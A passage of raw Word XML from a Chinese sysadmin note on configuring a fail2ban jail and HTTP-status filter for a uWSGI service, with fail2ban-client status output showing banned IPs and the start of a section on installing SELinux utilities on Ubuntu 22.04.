        <w:t>，自行命名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBC0CD6" w14:textId="599A6DEB" w:rsidR="006A10FB" w:rsidRPr="006A10FB" w:rsidRDefault="006A10FB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">vim </w:t>
      </w:r>
      <w:r w:rsidRPr="006A10FB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/etc/fail2ban/jail.d</w:t>
      </w:r>
      <w:r w:rsidRPr="006A10FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="006A10FB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>jail_uwsgi.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D9065F" w14:textId="77777777" w:rsidR="006A10FB" w:rsidRPr="006A10FB" w:rsidRDefault="006A10FB" w:rsidP="006A10FB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A10FB">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>[uwsgi]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD62D7F" w14:textId="77777777" w:rsidR="006A10FB" w:rsidRPr="006A10FB" w:rsidRDefault="006A10FB" w:rsidP="006A10FB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A10FB">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>enabled = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629C5550" w14:textId="77777777" w:rsidR="006A10FB" w:rsidRPr="006A10FB" w:rsidRDefault="006A10FB" w:rsidP="006A10FB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A10FB">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>port = 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2281BD26" w14:textId="77777777" w:rsidR="006A10FB" w:rsidRPr="006A10FB" w:rsidRDefault="006A10FB" w:rsidP="006A10FB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A10FB">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>protocol = tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66422189" w14:textId="77777777" w:rsidR="006A10FB" w:rsidRPr="006A10FB" w:rsidRDefault="006A10FB" w:rsidP="006A10FB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A10FB">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>filter = uwsgi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120D7098" w14:textId="77777777" w:rsidR="006A10FB" w:rsidRPr="006A10FB" w:rsidRDefault="006A10FB" w:rsidP="006A10FB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A10FB">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>logpath = /var/log/uwsgi/uwsgi.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A5394F" w14:textId="77777777" w:rsidR="006A10FB" w:rsidRPr="006A10FB" w:rsidRDefault="006A10FB" w:rsidP="006A10FB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A10FB">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>bantime = 120m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6594471E" w14:textId="77777777" w:rsidR="006A10FB" w:rsidRPr="006A10FB" w:rsidRDefault="006A10FB" w:rsidP="006A10FB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A10FB">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>findtime = 10m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566723B9" w14:textId="04792551" w:rsidR="00BD1EED" w:rsidRPr="006A10FB" w:rsidRDefault="006A10FB" w:rsidP="006A10FB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006A10FB">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>maxretry = 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467EDC05" w14:textId="77777777" w:rsidR="006A10FB" w:rsidRDefault="006A10FB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76E3338B" w14:textId="5F36622D" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，自行命名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17104686" w14:textId="7592C246" w:rsidR="006A10FB" w:rsidRDefault="006A10FB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">vim </w:t>
      </w:r>
      <w:r w:rsidRPr="006A10FB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/etc/fail2ban/filter.d</w:t>
      </w:r>
      <w:r w:rsidRPr="006A10FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="006A10FB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>uwsgi.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A953C39" w14:textId="77777777" w:rsidR="006A10FB" w:rsidRPr="006A10FB" w:rsidRDefault="006A10FB" w:rsidP="006A10FB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A10FB">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>[Definition]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3411AD" w14:textId="77777777" w:rsidR="006A10FB" w:rsidRPr="006A10FB" w:rsidRDefault="006A10FB" w:rsidP="006A10FB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A10FB">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>failregex = &lt;HOST&gt; \(.*\) .* \(HTTP/[012.]+ [345][0-9][0-9]\)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E260270" w14:textId="7A96F1CF" w:rsidR="006A10FB" w:rsidRPr="006A10FB" w:rsidRDefault="006A10FB" w:rsidP="006A10FB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006A10FB">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>ignoreregex =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16642C10" w14:textId="77777777" w:rsidR="00BD1EED" w:rsidRDefault="00BD1EED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A4CEAFB" w14:textId="277F06CE" w:rsidR="00BD1EED" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC5152">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/etc/fail2ban</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC5152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/jail.local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不要编辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jail.conf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02843C72" w14:textId="684357F3" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一众配置中新增如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7274A179" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRPr="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC5152">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>[uwsgi]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C186AEF" w14:textId="79AEEC67" w:rsidR="00722039" w:rsidRDefault="0016345C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jail.d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义和本初</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jail.local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的参数可互相迭代指定</w:t>
      </w:r>
      <w:r w:rsidR="00816875">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，此处可仅写个</w:t>
      </w:r>
      <w:r w:rsidR="00816875">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[uwsgi]</w:t>
      </w:r>
      <w:r w:rsidR="00816875">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而不写配置参数（因为我的方法，在</w:t>
      </w:r>
      <w:r w:rsidR="00816875">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jail</w:t>
      </w:r>
      <w:r w:rsidR="00816875">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中已写）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41405000" w14:textId="77777777" w:rsidR="0016345C" w:rsidRDefault="0016345C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60D4C157" w14:textId="0480A9A7" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fail2ban</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F493350" w14:textId="6C9A9B65" w:rsidR="00EC5152" w:rsidRPr="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC5152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>systemctl restart fail2ban</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7FD8F0" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A51D98A" w14:textId="41601F6D" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自己在本地打</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>304</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求包后，可以看到自己的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> uwsgi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">jail </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ban</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42100988" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F1FAB23" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@racknerd-c012d0:/etc/fail2ban/jail.d# </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC5152">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>fail2ban-client status uwsgi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF51FB9" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Status for the jail: uwsgi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CEFD63" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>|- Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DB7823" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>|  |- Currently failed: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639CA0E4" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>|  |- Total failed:     15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD5444A" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>|  `- File list:        /var/log/uwsgi/uwsgi.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A98F38" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>`- Actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE823FF" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   |- Currently banned: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB9C082" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   |- Total banned:     1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1B1106" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   `- Banned IP list:   129.151.212.54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B68C5D5" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@racknerd-c012d0:/etc/fail2ban/jail.d# </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC5152">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>fail2ban-client status sshd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7A4E21" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Status for the jail: sshd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781401FB" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>|- Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329CEAA7" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>|  |- Currently failed: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E2D4DF" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>|  |- Total failed:     6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410D3E70" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>|  `- File list:        /var/log/auth.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342116D8" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>`- Actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7476333C" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   |- Currently banned: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75986BAC" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   |- Total banned:     3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4CA9DF" w14:textId="73678E75" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   `- Banned IP list:   218.92.0.122 218.92.0.22 218.92.0.29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F938FD" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="152C73EE" w14:textId="3017180B" w:rsidR="00EC5152" w:rsidRDefault="00816875" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>postman</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时由于触发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ban</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，发送仅响应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">503 service unresposable, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACC1971" w14:textId="77777777" w:rsidR="00816875" w:rsidRDefault="00816875" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06F3F5A9" w14:textId="77777777" w:rsidR="00722039" w:rsidRDefault="00722039" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="610F98D5" w14:textId="26085094" w:rsidR="0098506B" w:rsidRDefault="0098506B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="228" w:name="_Toc159779688"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>selinux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的处理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="228"/>
    </w:p>
    <w:p w14:paraId="3FBCA2A3" w14:textId="03A06200" w:rsidR="0098506B" w:rsidRDefault="0098506B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ADC5651" w14:textId="3ACFD8F5" w:rsidR="0098506B" w:rsidRDefault="006570E4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="006570E4">
        <w:t>https://blog.csdn.net/yujin2010good/article/details/7638983</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367B42C3" w14:textId="52C31189" w:rsidR="0098506B" w:rsidRDefault="0098506B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20848924" w14:textId="0AB453AF" w:rsidR="006570E4" w:rsidRDefault="00950B40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>selinux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组件在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 22.04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认没有，需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装相关组件包</w:t>
      </w:r>
      <w:r w:rsidR="00D20290">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。目前</w:t>
      </w:r>
      <w:r w:rsidR="00D20290">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r w:rsidR="00D20290">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发行版并非全部都支持</w:t>
      </w:r>
      <w:r w:rsidR="00D20290">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SeLinux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B817F57" w14:textId="7F1A75AA" w:rsidR="006570E4" w:rsidRDefault="00950B40" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00950B40">
        <w:t>apt install selinux-utils</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F90161E" w14:textId="77777777" w:rsidR="006570E4" w:rsidRDefault="006570E4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
